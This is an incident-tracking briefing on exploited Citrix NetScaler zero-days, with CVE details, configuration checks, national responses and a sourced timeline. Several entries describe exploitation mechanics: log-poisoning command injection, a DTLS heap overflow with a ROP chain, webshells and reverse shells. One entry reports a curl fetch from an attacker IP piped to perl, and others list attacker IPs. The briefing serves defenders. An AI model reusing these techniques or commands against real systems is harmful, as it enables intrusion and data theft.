Critical Citrix NetScaler ADC / NetScaler Gateway

PitScaler - Citrix NetScaler Zero-Day Crisis

Two Citrix NetScaler ADC and NetScaler Gateway vulnerabilities, CVE-2026-88771 and CVE-2026-88772, were exploited in the wild as zero-days before disclosure. Both allow unauthenticated remote code execution (RCE) and are rated CVSS 4.0 9.5 Critical. Governments and companies across Europe shut down or disconnected their NetScalers while waiting for a patch. [25][82] Citrix fixed them in bulletin CTX697096 together with six other CVEs. [1][7]

Confirmed exploited zero-days
2

CVE-2026-88771, CVE-2026-88772

CVEs in bulletin CTX697096
8

CVE-2026-88771 to -88778

Public disclosure

15:51 UTC, per GreyNoise

CISA KEV federal deadline

KEV lists a date, no time; by CISA's 11:59 PM ET convention it expired 1 Oct 03:59 UTC — passed before this snapshot

Official Citrix bulletin and government advisories Research third-party technical analysis Telemetry sensor data (GreyNoise) Reported Beaumont's posts, community and press reports. These are claims and have not been independently verified.

Key facts

Key facts, as of
ProductsCitrix NetScaler ADC and NetScaler Gateway (customer-managed)
Confirmed exploitedCVE-2026-88771 (unauthenticated RCE, default configuration) and CVE-2026-88772 (DTLS memory overflow, RCE or DoS), both CVSS 4.0 9.5 and in CISA KEV [1][20]
Also in the bulletinCVE-2026-88773 (chained in the attacks according to Beaumont, not independently confirmed) and CVE-2026-88774 to CVE-2026-88778 (no exploitation reported) [63]
Exploited sinceAt least early September 2026. Unit 42 traces fingerprinting back to 21 Aug and .deb webshell requests to 4 Sep, eSentire saw exploitation on 5 Sep, and ACSC advises reviewing from 4 Sep [96][48][17]
Fixed builds14.1-73.37, 13.1-64.23, 14.1-73.37 FIPS, 13.1.37.279 FIPS/NDcPP and later (details)
First actionPreserve evidence and check for compromise, then patch. Patching does not remove a backdoor (detection)
AttributionNo actor is named. Mandiant's CTO says suspected state-sponsored actors are likely behind the initial CVE-2026-88772 intrusions [84]; Beazley notes no vendor has named an actor [43]
Recommended byGermany's BSI links to this site and recommends its IoC list (warning BITS-H 2026-289305-1132, 1 Oct 2026). [18]
This pageIndependent historical snapshot, not a live feed. Every claim is sourced and labelled official, research, telemetry or reported (methodology)

Overview: exploited NetScaler zero-day vulnerabilities

What happened

Citrix published bulletin CTX697096 with fixes for eight NetScaler ADC and Gateway CVEs on 27 September 2026. [1] The same day, CISA added CVE-2026-88771 and CVE-2026-88772 to the Known Exploited Vulnerabilities catalog, with a federal remediation deadline of 30 September. [7]

Google GTIG and Mandiant report that CVE-2026-88772 has been exploited since at least early September. Organisations in North America and Europe in government, financial services, education, and legal and professional services were likely affected. The attackers used new custom malware: WHIPSHOT, a PHP webshell, and SLAPSHOT, a Python tunneler that reaches into internal networks. [34]

eSentire's incident response saw CVE-2026-88771 exploited as early as 5 September. In one intrusion a webshell was installed and operated from that day, with signs of data exfiltration and lateral movement into the internal network. eSentire advises treating appliances that were Internet-facing and unpatched in early September as potentially compromised. [48]

Unit 42 counted 50,277 exposed NetScaler instances that could potentially be vulnerable, as of 27 September, from its Cortex Xpanse data. That is an exposure count, not a count of compromised systems. [96]

Censys detects NetScaler ADC or Gateway on 42,735 hosts, as of 28 September. The largest shares are in the US (32%) and Germany (13%). Shadowserver reports more than 20,000 instances exposed and potentially at risk. Both are exposure counts, not confirmed vulnerable or compromised systems. [60][98][97]

Who is affected and who responded

  • Victims: GTIG/Mandiant say organisations in North America and Europe in government, financial services, education, and legal and professional services were likely affected. [34][95] watchTowr CEO Benjamin Harris says there is no clear trend yet by industry or organisation size. Mandiant says dozens of organisations were hit, telecommunications among them. [101][95]
  • US: CISA added both CVEs to KEV and gave federal agencies until 30 September. [7] Beaumont publicly pointed the NSA at one of its Citrix hosts. The host has been validated as NSA-operated; whether it is compromised is not verified. [69]
  • Netherlands: NCSC-NL rates the advisory as high probability, high damage. Central government applied "loskoppelen tenzij" (disconnect unless) from 26 September. The Ministry of the Interior took all Citrix environments offline, and the Amphia (Breda) and ETZ (Tilburg) hospitals closed their patient portals after Z-CERT warned the healthcare sector. [100][105][9][25]
  • Germany: BSI rates its warning 3 / Orange (act immediately), says logs should be checked back to at least early September, and links to this site as a collection of detection options and IoCs, and recommends that operators use its growing IoC list. [18]
  • Denmark: Danish government agencies, among them PET, the Armed Forces and the police, took their NetScalers offline from Friday 25 September, two days before Citrix's disclosure. Copenhagen Airport also switched off its Citrix environment, and Shodan shows some Danish systems going dark from 23 September, according to Ingeniøren. The Danish Defence Intelligence Service (FE) warned NetScaler users on 27 September. DKCERT, the CERT for Danish universities and research institutions, followed on 29 September. [99][22]
  • UK and EU: NCSC-UK published an alert, and NHS England's cyber security operations centre issued alert CC-4858, rating further exploitation "almost certain". CERT-EU published Security Advisory 2026-014 and a technical writeup with hunting guidance, and Luxembourg's CIRCL published a set of per-CVE configuration checks. [23][21][10][27][24]
  • Australia: ACSC says Australian organisations have confirmed exploitation since its 28 September alert, and advises reviewing for compromise since at least 4 September. Its 3 October update adds the new SAML issue: ACSC "is aware of impacts to Australian organisations", says a remote attacker may induce system crashes, denial of service and potential exploitation, and points to Citrix's SAML guidance. The alert's original background text, still lower on the page, says no Australian exploitation of the September CVEs had been confirmed at first publication. [17]
  • France, Luxembourg and Quebec: CERT-FR says exploitation began before patches existed and relays the GTIG indicators, which it has not qualified. The CSSF tells supervised financial entities that unauthenticated remote code execution is a major ICT-related incident to notify, and CERT Quebec rates the risk critical. [13][14][15]
  • Finland: NCSC-FI (Traficom) confirmed intrusions in Finland that began before the 27 September patches were released, warns that internet-facing systems must be assumed exposed and that updating alone may not be enough, and says it has identified hundreds of Finnish NetScaler instances and contacted their administrators. [19]
  • Canada, Hong Kong and Singapore: CCCS, HKCERT and CSA Singapore issued advisories. [12][17][16][11]

GreyNoise sensors recorded exploitation from one IP on 24 September, three days before public disclosure. GreyNoise's retro-hunt found no other exploitation sessions before disclosure. That result covers GreyNoise's own sensors, not all Internet activity. [53][54]

The name

Kevin Beaumont (@GossiTheDog) coined the name "PitScaler" on 28 September. [66] It refers to the root cause: a Perl script writing to /tmp. CERT-EU's writeup title describes this as Citrix taking execute logging a bit too literally. [27]

Reported by Beaumont Unverified claims

  • Chaining CVE-2026-88771, -88772 and -88773 gives unauthenticated RCE in the default appliance configuration. Webshells were dropped throughout September. He calls the attackers Probably nation state aligned. [63] The quote was checked against the post on 29 September. GTIG/Mandiant separately confirm webshells since at least early September. [34] No one else has confirmed the CVE-2026-88773 link. On attribution, Mandiant's CTO separately says advanced and suspected state-sponsored actors are likely behind the initial CVE-2026-88772 intrusions, without naming an actor [84], and watchTowr says no attribution has been made public. [95]
  • He says he is tracking over 100 victim organisations, each with a unique webshell. [66]
  • His firmware version scanning suggests fewer than 10% of boxes are patched. [68]

These figures are Beaumont's own public statements and have not been independently confirmed.

The eight NetScaler vulnerabilities (CVEs) in CTX697096

Citrix's bulletin lists all eight CVEs with CVSS 4.0 scores and preconditions, and NCSC-NL's advisory NCSC-2026-0394 gives the same figures. Only CVE-2026-88771 and CVE-2026-88772 are confirmed exploited. [9][1][7]

CVE-2026-88771

Exploited in the wild CVSS 4.0: 9.5 Critical
Type
Improper input validation; unauthenticated remote command execution. [1]
Exposure
Affects the DEFAULT configuration; no features need to be enabled. [1]
Root cause (CERT-EU)
/netscaler/ns_monuploadd_err.pl passes unsanitised input to grep+exec; a tail -1 race condition is also involved. [27]
Status
Exploited in the wild; in CISA KEV since Sep 27. [1][7]

CVE-2026-88772

Exploited in the wild CVSS 4.0: 9.5 Critical
Type (Citrix)
Memory overflow leading to RCE or DoS when DTLS is enabled. [1]
Exposure
DTLS is ON by default on VPN virtual servers unless the admin sets -dtls OFF. [1]
Campaign (GTIG/Mandiant)
Exploited since at least early September. Exploitation crashes the NSPPE packet engine and gives root-level access. Organisations in North America and Europe in government, financial services, education and legal/professional services were likely impacted. [34]
Mechanics (watchTowr)
Preauth heap overflow in the DTLS stack (nsppe process); 137,825 bytes written past the buffer; control gained via an overwritten global list pointer, then a ROP chain calling mprotect and jumping to shellcode - full RCE, not just DoS. [30]
Status
Exploited in the wild; in CISA KEV since Sep 27. [1][7]
Config check (Citrix)
Citrix: a Gateway is vulnerable unless DTLS is explicitly disabled. add vpn vserver vpn1 SSL 10.0.0.0 443 -Listenpolicy NONE means DTLS is on by default; the same line with -dtls OFF means it is off. add vpn vserver vs1 DTLS 10.11.1.1 443 and add lb vserver vd_dtls DTLS 10.146.111.74 443 mean DTLS is enabled. [1]

CVE-2026-88773

Chain component according to Beaumont CVSS 4.0: 9.3 Critical
Type
HTTP request smuggling (CWE-444). [1][9]
Precondition
HTTP configuration enabled on NetScaler ADC or Gateway. No authentication or user interaction needed (NCSC-NL). [1][9]
Role (Beaumont)
Used in a chain with CVE-2026-88771 and CVE-2026-88772 in the original attacks, according to Beaumont. Not independently confirmed; no source reports it exploited on its own. [63]
Config check (Citrix)
Citrix: met when load balancing, content switching, VPN or authentication virtual servers of type HTTP or SSL exist (add lb, cs, vpn or authentication vserver, followed by a name and HTTP or SSL). [1]

CVE-2026-88774

No exploitation reported CVSS 4.0: 7.0
Type
Feature policy bypass due to improper HTTP URL-based expression usage (CWE-16). [1][9]
Precondition
Any policy expression configured with an HTTP URL-based expression. [1]
Config check (Citrix)
Citrix: the same virtual-server check as CVE-2026-88773 (HTTP or SSL virtual servers on LB, CS, VPN or authentication). [1]

CVE-2026-88775

No exploitation reported CVSS 4.0: 8.8
Type
Memory overflow leading to unpredictable behaviour or denial of service (CWE-119). [1][9]
Precondition
Configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. [1]
Config check (Citrix)
Citrix: look for configuration lines matching add vpn vserver .* (Gateway) or add authentication vserver .* (AAA). [1]

CVE-2026-88776

No exploitation reported CVSS 4.0: 8.8
Type
Memory overflow leading to unpredictable behaviour or denial of service (CWE-119). [1][9]
Precondition
Load Balancing virtual server of type Oracle. [1]
Config check (Citrix)
Citrix: look for a configuration line matching add lb vserver.*ORACLE.* [1]

CVE-2026-88777

No exploitation reported CVSS 4.0: 8.8
Type
Memory overflow leading to unpredictable behaviour or denial of service (CWE-119). [1][9]
Precondition
LB/CS or CGNAT-LSN/NAT64 device with a non-HTTP L7 protocol feature enabled. [1]
Config check (Citrix)
Citrix gives case-insensitive configuration-text patterns (not CLI commands) to search in /nsconfig/ns.conf or show ns runningConfig: FTP over LB or CS (add (lb|cs) vserver .* FTP, add service .* FTP), FTP health monitors (add lb monitor .* FTP or FTP-EXTENDED), LSN groups (add lsn group .*; FTP ALG counts as enabled unless set lsn group .* -ftp DISABLED is present), RTSP (set lsn group .* -rtspalg ENABLED), DNS64 (add lb vserver .* DNS .* -dns64 ENABLED; add dns policy64 counts only if bound to a DNS virtual server) and NAT64 (add nat64). [1]

CVE-2026-88778

No exploitation reported CVSS 4.0: 8.8
Type
TCP Initial Sequence Number (ISN) prediction (CWE-342). [1][9]
Precondition
TCP configuration enabled. CIRCL gives a CLI check for disabled Enhanced ISN Generation. [1][24]
Fix
Closed by enabling Enhanced ISN Generation; the upgrade alone does not fix it. [1][94][21]
Config check (Citrix)
Citrix: both must be true. (1) At least one virtual server of type HTTP, SSL, SSL_BRIDGE, TCP, SSL_TCP, FTP, NNTP, RTSP, RDP, DNS_TCP, DOT, SIP_TCP, SIP_SSL, DIAMETER, SSL_DIAMETER, MYSQL, MSSQL, ORACLE, SMPP, MQTT, MQTT_TLS, MONGO, MONGO_TLS, PROXY, SSL_PROXY, USER_TCP or USER_SSL_TCP. (2) show ns tcpparam | grep "Enhanced ISN Generation" returns DISABLED. [1]

Timeline

Times are UTC unless marked otherwise. Events without a time show only their date. Expand an event to see its sources.

  1. Research

    Unit 42: earliest activity is NetScaler version fingerprinting

    On 21 Aug 104.248.244.66 and then 77.83.199.39 requested /admin_ui/common/css/ns/ui.css and /vpn/js/rdx/core/lang/rdx_en.json.gz from a US NetScaler Gateway. On 21 and 22 Aug these two hosts and 78.47.24.217 sent the same requests to more than 100 other systems. Unit 42 describes this as fingerprinting, not exploitation.

    Sources: [96]

  2. Research

    Unit 42: .deb webshell requests begin (CVE-2026-88772 chain)

    From 4 to 24 Sep the actor repeatedly requested .deb files in /vpn/scripts/linux/, rotating infrastructure: one VPS per day on 4-8 Sep, Cloudflare WARP addresses on 9-11 Sep, 162.33.178.9 on 14 Sep and 193.149.176.207 daily on 15-24 Sep. A continuous stream of requests to /logon/LogonPoint/Authentication/GetUserName ran from 10 Sep until 01:54 UTC on 27 Sep, hours before the bulletin.

    Sources: [96]

  3. Research

    eSentire: CVE-2026-88771 exploited as early as 5 September

    eSentire TRU incident response saw exploitation of Internet-facing NetScaler Gateways from 5 Sep, more than three weeks before disclosure: base64 PHP staged in the access log via fake /vpn/media/*.ico requests, then executed through a crafted login username. In one intrusion a .deb-variant webshell was installed and operated from 5 Sep, with signs of data exfiltration and lateral movement to internal virtual desktops and back to the appliance over SSH.

    Sources: [48]

  4. Official advisory Validated

    CVE IDs reserved

    NetScaler reserves CVE-2026-88771 and CVE-2026-88772 at 07:14 UTC. The records were published on 27 Sep at 16:02 and 16:09 UTC.

    Validated against the CVE record on 29 Sep.

    Sources: [26][54]

  5. Research

    Unit 42: three-stage CVE-2026-88771 chain drops a PHP webshell

    77.83.199.39, 78.47.24.217 and 139.180.152.138 staged a Base64 dropper in the User-Agent (logged to httpaccess-vpn.log), poisoned ns.log with a fake pitboss heartbeat message, and had ns_monuploadd_err.pl -WR decode and run it, installing the .ctxs.receiver webshell at a US target.

    Sources: [96]

  6. Reported observation

    Danish NetScalers start going offline

    Ingeniøren's review of Shodan data shows several Danish NetScaler systems switched off from 23 Sep, four days before Citrix's public disclosure.

    Sources: [99]

  7. Telemetry

    GreyNoise sensors see exploitation from a single IP

    149.104.78.141: 3 sessions 07:32:19-07:32:20 UTC. IP flagged "suspicious" (Citrix ADC Gateway Login Panel Crawler), then "malicious" (Generic ${IFS} Use in RCE Attempt; CitrixBleed 2 attempt). Later retro-tagged as CVE-2026-88771. GreyNoise's retro-hunt found no other exploitation sessions before disclosure - this covers GreyNoise sensors only.

    Sources: [53][54][55]

  8. Reported observation Validated

    Danish government agencies shut down their NetScalers

    Danish agencies, among them PET, the Armed Forces and the police, took their Citrix NetScaler environments offline from Friday 25 Sep, two days before Citrix disclosed the vulnerabilities. Ingeniøren later reported the shutdowns from Shodan data; none of the agencies would explain why.

    The Friday 25 Sep shutdown was validated independently on 30 Sep.

    Sources: [99]

  9. Official advisory

    NCSC-NL confidentially warns Dutch organisations

    On the afternoon of Friday 25 Sep, after a tip from a European partner, NCSC-NL confidentially informed companies and organisations, including central government, about two NetScaler zero-days being exploited outside the Netherlands, before any patch existed. Dark Reading reports that a copy of the pre-notification, marked TLP:AMBER+STRICT, was briefly posted on Reddit and then deleted. According to BleepingComputer, the notice said Citrix found the vulnerabilities while investigating incidents at customers and filed a notification under the EU Cyber Resilience Act.

    Sources: [25][104][82]

  10. Reported observation Validated

    r/Citrix "Netscaler leak?" thread

    User FastFredNL opens the thread at 06:43:22 UTC (08:43 CEST), reporting that an IT provider advised shutting NetScalers down immediately. It becomes the first public gathering point, with admins reporting similar unofficial advice over the weekend. Dark Reading dates the first reports to 25 Sep, but the thread itself was posted on 26 Sep.

    Post timestamp checked on the thread itself (30 Sep). The shutdown advice is consistent with the Dutch government letter to parliament.

    Sources: [108][57][104][25]

  11. Research

    watchTowr: two unpatched RCE zero-days, found during forensics

    Two vulnerabilities - both RCE. Unpatched, 0days. Exploited in-the-wild - discovered during forensics.

    watchTowr adds that Citrix comms and patches are expected early the following week.

    Sources: [51]

  12. Reported observation

    IFIN opens a public tracking thread

    IFIN starts compiling public reporting and observables for the NetScaler zero-days; it later states that all observables it shares were shared without restriction.

    Sources: [57]

  13. Reported observation

    watchTowr: pull NetScaler appliances offline immediately

    Please, take this seriously and pull NetScaler appliances offline immediately.

    watchTowr publicly warns that credible rumours of unpatched NetScaler RCEs are circulating; later that day CEO Benjamin Harris says the rumours are confirmed and urges admins to pull NetScaler appliances offline immediately.

    Sources: [104]

  14. Reported observation

    Dutch hospitals Amphia and ETZ close patient portals

    Patients of Amphia (Breda) and Elisabeth-TweeSteden Ziekenhuis (Tilburg) cannot log in to their portals; other Dutch hospitals report problems too. That evening Z-CERT, the Dutch healthcare CERT, says it warned the sector about critical vulnerabilities in Citrix NetScaler and advised temporarily switching the system off.

    Sources: [105]

  15. Official advisory

    Public disclosure; Citrix publishes CTX697096 with fixes

    Disclosure time per GreyNoise. The bulletin covers 8 CVEs. watchTowr notes the patch it analysed was dated 24 Sep, suggesting Citrix knew of the exploitation the week before.

    Sources: [1][54][104]

  16. Official advisory

    Citrix announces the bulletin on r/Citrix

    A Citrix staff account (CTX-Michael) posts a CRITICAL UPDATE in r/Citrix linking the CTX697096 bulletin and the Citrix community blog post with its IoC section, and quoting that exploitation of CVE-2026-88771 and CVE-2026-88772 on unmitigated deployments has been observed.

    Sources: [5][4]

  17. Telemetry

    GreyNoise deploys CVE-specific tag

    Tag deployed 20:28:39 UTC; the 24 Sep sessions are retro-tagged as CVE-2026-88771.

    Sources: [54][56]

  18. Official advisory Validated

    CISA adds CVE-2026-88771 and CVE-2026-88772 to KEV

    Both were added on 27 Sep with a federal remediation deadline of 30 Sep. The 21:30 UTC release time comes from the compiled dataset and was not found in the sources checked.

    Dates validated against the KEV catalog feed on 29 Sep.

    Sources: [7][20]

  19. Telemetry

    Unit 42: 50,277 exposed instances

    Palo Alto Networks Cortex Xpanse identifies 50,277 exposed NetScaler instances that could potentially be vulnerable (update posted 4:15 p.m. PT). Exposure, not confirmed compromise.

    Sources: [96]

  20. Official advisory

    Danish Defence Intelligence (FE) and CERT-EU warn NetScaler users

    The Danish Defence Intelligence Service sent a warning urging NetScaler users to update, per Ingeniøren. CERT-EU published Security Advisory 2026-014 recommending an immediate update of all customer-managed appliances and enabling Enhanced ISN Generation where TCP is configured.

    Sources: [99][21]

  21. Reported observation

    Beaumont: three CVEs chained, webshells all September

    The primary vulns being exploited are CVE-2026-88771, CVE-2026-88772, CVE-2026-88773 chained. It gives unauth RCE in default appliance config. Attackers using it to drop webshells all month of September. Probably nation state aligned

    Beaumont's claim; attribution not independently verified.

    Sources: [63]

  22. Reported observation

    Beaumont: patches live, detection script behind NDA

    patching alone doesn't remove the backdoors being placed

    Patches are live on the main support site; Citrix's detection script is locked behind NDA/support.

    Sources: [64]

  23. Reported observation Validated

    Beaumont: Console check misses earlier attempts

    The NetScaler Console check misses earlier semi-successful attempts because it relies on logs not having rotated; he adds that the activity is weeks old because of slow disclosure.

    Validated independently on 29 Sep.

    Sources: [65]

  24. Official advisory

    NHS England alert CC-4858

    NHS England's National CSOC rates the threat High and assesses further exploitation as almost certain. It strongly recommends a compromise assessment before patching, since patching first may delete evidence, and warns that end-of-life 12.1 and 13.0 releases are likely vulnerable and receive no fix. Published 10:40 UK time.

    Sources: [23]

  25. Reported observation

    Beaumont names it "PitScaler"

    I'm tracking over 100 victim orgs now. Each one has a unique webshell which can't be scanned for remotely unless you're the attacker. It's espionage.

    Victim count is Beaumont's claim, not independently verified.

    Sources: [66]

  26. Reported observation Validated

    Beaumont: Citrix checker incomplete

    Some really big orgs are backdoored after patching still

    The checker does not check for suid on /bin/sh; Beaumont calls on NCSCs to publish a detection script.

    The missing suid /bin/sh check was validated independently on 29 Sep. The claim about big organisations still being backdoored is not independently verified.

    Sources: [67]

  27. Official advisory

    CERT-FR, CSSF (Luxembourg) and CERT Quebec issue alerts

    CERT-FR says the two vulnerabilities allow unauthenticated remote code execution, are actively exploited and were exploited before patches existed. The CSSF points supervised financial entities to the CIRCL report and reminds them that unauthenticated remote code execution is unauthorised access, so it counts as a major ICT-related incident to notify under DORA or its national circulars. CERT Quebec rates the risk critical (TLP:CLEAR) and says Quebec public bodies using a vulnerable product must test and deploy the vendor updates or mitigations.

    Sources: [13][14][15]

  28. Reported observation

    Press covers the weekend shutdown warnings

    BleepingComputer, SecurityWeek, The Record and CyberScoop cover the story.

    Sources: [82][89][90][91]

  29. Research

    CERT-EU technical writeup on CVE-2026-88771

    "Taking 'execute logging' a bit too literally" - root cause, attack chain and hunting guidance.

    Sources: [27]

  30. Official advisory

    Government advisories worldwide

    NCSC-NL NCSC-2026-0394 [H/H], NCSC-UK, CSA Singapore AL-2026-129, plus Canada, HKCERT, ACSC, and CIRCL TR-100 with per-CVE config-check CLI commands.

    Sources: [9][10][11][12][16][17][24]

  31. Telemetry

    GreyNoise publishes TLP:CLEAR IoC set

    "Swarming Against Citrix 0-Day Exploitation" - the first public IoC set in this compiled dataset as of 29 Sep, with a companion Chronicle timeline.

    Sources: [53][54]

  32. Research

    watchTowr Labs part 1 (CVE-2026-88771)

    "Oh Look, the Foot Gun Went Off Again", published with a Detection Artefact Generator (PoC-class tool).

    Sources: [28][29]

  33. Telemetry

    Censys and Shadowserver count exposed NetScalers

    Censys detects NetScaler ADC or Gateway on 42,735 hosts and 323,527 web properties; these are exposed instances, not confirmed-vulnerable counts. Shadowserver reports more than 20,000 instances exposed and potentially at risk.

    Sources: [60][97]

  34. Telemetry

    Lupovis honeypots see exploitation minutes after the public PoC

    Lupovis says its sensors recorded live CVE-2026-88771 exploitation attempts within minutes of watchTowr releasing its PoC; the attempts were opportunistic, from several distinct actors.

    Sources: [98][43]

  35. Research

    First public detection rules

    Elastic merges a rule for NetScaler log-poisoning command injection; Corelight publishes Zeek hunting queries. Sigma and Nuclei pull requests follow (28-29 Sep, still unmerged at snapshot time).

    Sources: [45][44][46][47]

  36. Research

    Truesec publishes potential C2 IPs

    Truesec lists 104.248.244.66, 139.180.152.138 and 77.83.199.39 as potential C2 IPs it has observed.

    Sources: [33]

  37. Official advisory Validated

    ACSC alert; Australian organisations later confirm exploitation

    Australia's ACSC publishes an alert on 28 Sep. In an update it says Australian organisations have since confirmed exploitation, and recommends reviewing for evidence of compromise since at least 4 Sep 2026. The original background text, still lower on the page, says no Australian exploitation had been confirmed at first publication.

    Both statements checked on the ACSC page on 1 Oct.

    Sources: [17]

  38. Reported observation

    Dutch ministry and hospitals take systems offline

    The Dutch Ministry of the Interior took all Citrix environments offline over the weekend; patients of two major hospitals (Amphia and ETZ) could not view their records, and Frisius MC in Leeuwarden shut down some digital systems as a precaution (SDxCentral, citing Techzine).

    Sources: [100]

  39. Research

    Sygnia: new "unexpectedly died" log-poison variant

    Sygnia saw commands after pitboss PPE unexpectedly died NSPPE; in raw logs: copying ns.conf to /var/netscaler/logon/insight-new.js (00:59 UTC), curl of update_c08937.pl from 64.94.85.67 piped to perl (03:18 UTC) and whoami (04:05-04:07 UTC). Sygnia notes this shows the commands reached the vulnerable logging path, not that they ran.

    Sources: [37]

  40. Reported observation

    Beaumont: mass exploitation

    #PitScaler is under mass exploitation, seeing it spray and pray now. I've done some firmware version scanning, fewer than 10% of boxes are patched

    The <10% figure is Beaumont's own estimate, not independently verified.

    Sources: [68]

  41. Reported observation Compromise unverified

    Beaumont posts a public message to the NSA

    do forensics on 103.41.70.207,vdicorp.nsa.gov

    The domain resolves to that IP. That the host is an NSA-operated Citrix system has been validated independently. That it is compromised is Beaumont's implication and is not verified. This briefing does not identify any organisation as compromised, and these values are not listed as IoCs.

    Sources: [69]

  42. Reported observation Validated

    Beaumont: IR writeups expose victim-unique indicators

    IR vendors are publishing PitScaler writeups containing victim-unique webshell names (.sig files) and attacker IPs, which he says lets him map victim orgs via network traffic. He warns that unremediated orgs' published webshell names can be used to access their boxes, and says one vendor uploaded its IR investigation to VirusTotal.

    Validated independently on 29 Sep.

    Sources: [70]

  43. Reported observation

    The Register: government, banks and professional services targeted

    Why Citrix took so long to disclose these vulnerabilities is a question only Citrix can answer

    It reports GTIG/Mandiant findings that government, financial services, education and legal and professional services organisations in North America and Europe were likely hit. watchTowr CEO Benjamin Harris criticises the slow disclosure and says no attribution has been made public.

    Sources: [95][34]

  44. Research

    watchTowr Labs part 2 (CVE-2026-88772)

    "Here We Go Again" (Sina Kheirkhah) - full RCE analysis plus a second Detection Artefact Generator.

    Sources: [30][31]

  45. Research

    Google GTIG / Mandiant: custom malware WHIPSHOT and SLAPSHOT

    The CVE-2026-88772 campaign has been ongoing since at least early September. WHIPSHOT is a PHP webshell staged with a .deb disguise that hides base64 C2 in HTTP headers; SLAPSHOT is a Python TCP tunneler (open/push/pull/exch/close/ping) used to reach internal networks for reconnaissance and credential theft.

    Sources: [34][95]

  46. Reported observation

    BleepingComputer: credential theft and internal spread

    It reports that attackers exploited CVE-2026-88772 to deploy webshells and tunneling malware, gain root, steal credentials and spread into internal networks, citing Mandiant. GTIG itself describes the credential theft and internal reconnaissance in at least one observed intrusion.

    Sources: [81][34]

  47. Reported observation Validated

    Mandiant CTO: check for compromise before patching

    Given the active exploitation, NetScaler customers should prioritize examining their systems for compromise *before* upgrading/patching

    Charles Carmakal on LinkedIn, as quoted by The Register.

    Quote validated against a second, non-public source on 29 Sep.

    Sources: [95]

  48. Research

    Nextron releases THOR rules and a NetScaler filesystem IoC set

    Three rules in the THOR Preview channel (higher false-positive rate than stable rules) plus a YAML IoC set derived from the filesystem checks in Citrix's scanner script. A match is a lead, not proof.

    Sources: [35]

  49. Research

    eSentire publishes first-hand IR findings and IoCs

    Two webshell variants (.ico and .deb), 14 IPs and 2 SHA-256 hashes; the technique matches CERT-EU's description. eSentire advises treating appliances that were Internet-facing and unpatched in early September as potentially compromised until an integrity assessment shows otherwise.

    Sources: [48]

  50. Telemetry

    Defused: hundreds of decoy hits across multiple exploit paths

    Defused reports hundreds of CVE-2026-88771 hits on its decoys in 24 hours via /nf/auth/doAuthentication.do, /cgi/login, /p/u/doLogon.do, /logon/LogonPoint/tmindex.html and User-Agent payloads on /. Observed follow-up: whoami/id to prove root, nx_verify.html marker files, curl/wget/fetch pulling a second stage, and blind DNS callbacks. Full IoCs are on Defused Radar (not reproduced here).

    Sources: [61]

  51. Official advisory

    DKCERT warns Danish universities and research institutions

    DKCERT, the CERT for the Danish research and education network, reports two critical NetScaler zero-days exploited before a patch and notes that several administrators took systems offline before Citrix published details.

    Sources: [22]

  52. Reported observation

    Mandiant: dozens of organisations impacted

    Cybersecurity Dive reports Mandiant CTO Charles Carmakal saying the actor deployed webshells and moved laterally into internal networks at some targets, with dozens of organisations impacted across North America and Europe, including telecommunications.

    Sources: [101]

  53. Official advisory

    Dutch government confirms preventive disconnection

    Letter to parliament: on Saturday 26 Sep the CIO Rijk set the line "loskoppelen tenzij" (disconnect unless) for central government, and it was broadly applied; remote-work access has not yet been restored everywhere while the patch is tested and forensic investigation continues. Beaumont relays it at 18:32 UTC as "shut down all Citrix Netscalers".

    Sources: [25][72]

  54. Reported observation

    Ingeniøren: PET, Danish Defence and police shut down Citrix

    Based on Shodan data, Ingeniøren reports that PET, the Danish Armed Forces, the Danish police and Copenhagen Airport, among many others, had to switch off their Citrix environments over the weekend. None of the agencies would explain why.

    Sources: [99]

  55. Research

    Unit 42 expands its threat brief

    Adds pre- and post-disclosure activity back to 21 Aug, analysis of the nsg64.deb RC4 webshell and the .ctxs.receiver webshell, hunting queries and a formal IoC list. Updated 15:00 PT.

    Sources: [96]

  56. Official advisory

    CERT-FR updates its alert with GTIG indicators

    The update relays the GTIG/Mandiant indicators and YARA rules, which ANSSI says it has not qualified, and the two patterns GTIG calls characteristic of successful exploitation: a DTLS handshake-failure line in syslog, and a pitboss NOT restarting NSPPE line in /var/log/messages. CERT-FR also says it knows of public proof-of-concept code for CVE-2026-88771 (noted 28 Sep) and for CVE-2026-88772.

    Sources: [13]

  57. Official advisory

    NCSC-NL revises its advisory to version 1.0.1

    The revision (30 Sep) extends the recommended actions with information on the Console scan script and IoCs, and says customers without Console should ask Citrix Support for the generic IoCs. The advisory says installing the update prevents new abuse but does not rule out earlier abuse, advises securing relevant logging and a memory dump before updating, and says appliances that were internet-facing before the update should be treated as possibly compromised.

    Sources: [9]

  58. Research

    TENEX traces a Platypus C2 chain from the injected login

    From malicious login requests TENEX followed four rotating staging hosts to a shell loader that enrols the off-the-shelf Platypus agent from entretiensol.com, then mapped a four-node C2 cluster through one shared TLS certificate. It also recovered the Python (customsnmpd reverse shell) and Perl (sec_monitor, .local_journal webshell, SUID /bin/sh, config theft) stages, and saw a separate loud wave of commodity payloads after the public PoC. TENEX does not name an actor and says logs show attempts, not confirmed execution.

    Sources: [38]

  59. Official advisory

    Citrix updates its community bulletin

    Last updated 30 Sep. It adds: a known issue where 13.1-64.23 can enter a reboot loop during upgrade if show ns variable lists variables (use 13.1-64.24); a Console Security Advisory scan that may wrongly flag 13.1-64.23 as vulnerable until the next automatic advisory update; a note that NetScaler VPX 15.1 Technology Preview is also vulnerable, is not permitted in production, and a fix will follow; and that samlRejectUnsignedAssertion OFF is no longer supported and is converted to the secure default on upgrade. For suspected compromise Citrix recommends deploying a new, updated instance rather than relying on the update, forwarding logs to an external SIEM, and using Console File Integrity Monitoring.

    Sources: [4]

  60. Research

    Arctic Wolf publishes follow-up exploitation IoCs and the nsmon.pl implant

    Commands fetched Python, Perl and shell scripts, opened reverse shells and sent Base64 command output over HTTP. The 3,752-byte Perl script nsmon.pl installs under /var/tmp/.nsmon, attempts to add a root cron entry every five minutes, attempts to listen on a port in 41000-41999 and begins a UDP or TCP check-in. These are attempts in the visible code, not proven persistence. Arctic Wolf also shows the injected username as it appears in AAA, AAATM and SSLVPN appliance logs.

    Sources: [36]

  61. Research

    Sygnia publishes an IR-based advisory

    Investigation-derived indicators (IPs, .sig artefacts, a JSON artefact and a SHA-256) that Sygnia stresses are context-specific and not Citrix-published; validate NAT and direction before blocking.

    Sources: [37]

  62. Reported observation

    Mandiant CTO: suspected state-sponsored actors likely behind the first intrusions

